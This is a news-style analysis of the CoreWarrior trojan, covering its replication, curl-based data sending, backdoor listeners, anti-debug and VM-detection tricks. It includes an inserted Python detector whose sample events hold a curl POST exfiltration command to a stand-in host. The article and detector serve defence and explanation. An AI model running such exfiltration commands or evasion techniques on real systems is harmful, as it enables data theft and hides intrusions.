CoreWarrior malware is spreading rapidly

CoreWarrior malware, a persistent trojan, aggressively spreads by creating numerous copies and establishing multiple backdoor connections.

It actively monitors user interactions by hooking Windows UI elements, posing a significant security threat.

The malware is a UPX-packed executable that has been modified so that standard UPX tools cannot unpack it. The modification likely involves changes to the UPX header or unpacking routine, so specialized techniques or tools are needed to analyze the malware’s contents.

Initial detection

The executable self-replicates with a random name and then uses the copy to launch a command prompt and execute a curl command to send data to a specified URL via a POST request.

The parent program efficiently implemented a process of creating and deleting copies with each successful POST, resulting in the rapid generation and disposal of one hundred and seventeen copies within a ten-minute timeframe.
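The copy-and-POST loop described above leaves a recognizable trail in process-creation telemetry: many differently named parent executables launching curl POSTs within a short window. The following detection sketch is an added example, not code from SonicWall or the original article; the record layout, file names, URL and the threshold of three parents are assumptions made up for the illustration.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed process-creation records (timestamp, parent image, image, command line).
# All paths, file names and the URL are made up for this example.
T = r"C:\Users\u\AppData\Local\Temp" + "\\"
POST = 'cmd.exe /c curl -X POST -d "k=v" http://collector.example.invalid/in'
SAMPLE_EVENTS = [
    ("2024-10-01T10:00:05", T + "kqzvhpxa.exe", r"C:\Windows\System32\cmd.exe", POST),
    ("2024-10-01T10:00:09", T + "wmrtyqbn.exe", r"C:\Windows\System32\cmd.exe", POST),
    ("2024-10-01T10:00:14", T + "zxplkvud.exe", r"C:\Windows\System32\cmd.exe", POST),
    ("2024-10-01T10:03:00", r"C:\Program Files\Updater\updater.exe",
     r"C:\Windows\System32\curl.exe", "curl https://example.invalid/version.json"),
    ("2024-10-01T10:30:00", T + "hbnqwert.exe", r"C:\Windows\System32\cmd.exe", POST),
]

# curl options that send a request body; matching is case-sensitive because -D differs from -d.
POST_FLAGS = re.compile(r"(?:\s-X\s*POST\b|\s(?:-d|--data[\w-]*|-F|--form)\s)")

def is_curl_post(cmdline):
    """True when the command line invokes curl with a POST-style option."""
    return "curl" in cmdline.lower() and bool(POST_FLAGS.search(cmdline))

def find_bursts(events, window=timedelta(minutes=10), min_parents=3):
    """Return (timestamp, parents) each time enough distinct parent images
    have issued curl POSTs inside the sliding window."""
    recent = deque()  # (time, parent image) of curl POSTs still inside the window
    alerts = []
    for ts, parent, _image, cmdline in sorted(events):
        if not is_curl_post(cmdline):
            continue
        now = datetime.fromisoformat(ts)
        recent.append((now, parent.lower()))
        while now - recent[0][0] > window:  # drop entries older than the window
            recent.popleft()
        parents = {p for _, p in recent}
        if len(parents) >= min_parents:
            alerts.append((ts, sorted(parents)))
    return alerts

if __name__ == "__main__":
    for ts, parents in find_bursts(SAMPLE_EVENTS):
        print(ts, "curl POST burst from", len(parents), "distinct parent images")
```

The ten-minute window mirrors the timeframe reported above; on real telemetry the parent threshold would be tuned against the environment's normal curl usage.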

Malware is connecting to the site and posting data

The program, upon sending messages, establishes a listener on a range of ports. While a secondary IP address received a connection, no data was transmitted or received over either TCP or UDP.

It employs anti-debug measures, using rdtsc to measure debug times and terminating the program if these times surpass a predefined threshold. It also establishes a hook to monitor system drive changes and gathers information about available drives.

The proposed evasion technique involves implementing a randomized sleep timer that dynamically adjusts its duration based on the number of connection attempts, successes, and failures. 

Adaptive mechanisms like this one are designed to conceal the actions of attackers and make it more difficult for intrusion detection systems to identify them.

The multi-part output of data sent

To identify a virtual machine environment, it is necessary to search for particular strings within the environment variables, registry entries, or kernel modules of the specific system. 

According to SonicWall, it is possible to identify the virtual machine environment by using these strings, which are specific to Hyper-V containers and indicate the presence of virtualization technology.

The code potentially uses the FTP, SMTP, and POP3 protocols to steal sensitive data from the system. These protocols are commonly used for transferring files and emails and could be exploited to transmit confidential information outside the network without authorization.

The indicators of compromise (IOCs) that have been provided are most likely signatures of malware, with the first one representing a packed executable and the second one representing its unpacked counterpart. 

The packed version is obfuscated to make analysis more difficult, whereas the unpacked version is easier to read, making it easier for security researchers to recognize and analyze malicious behaviors.
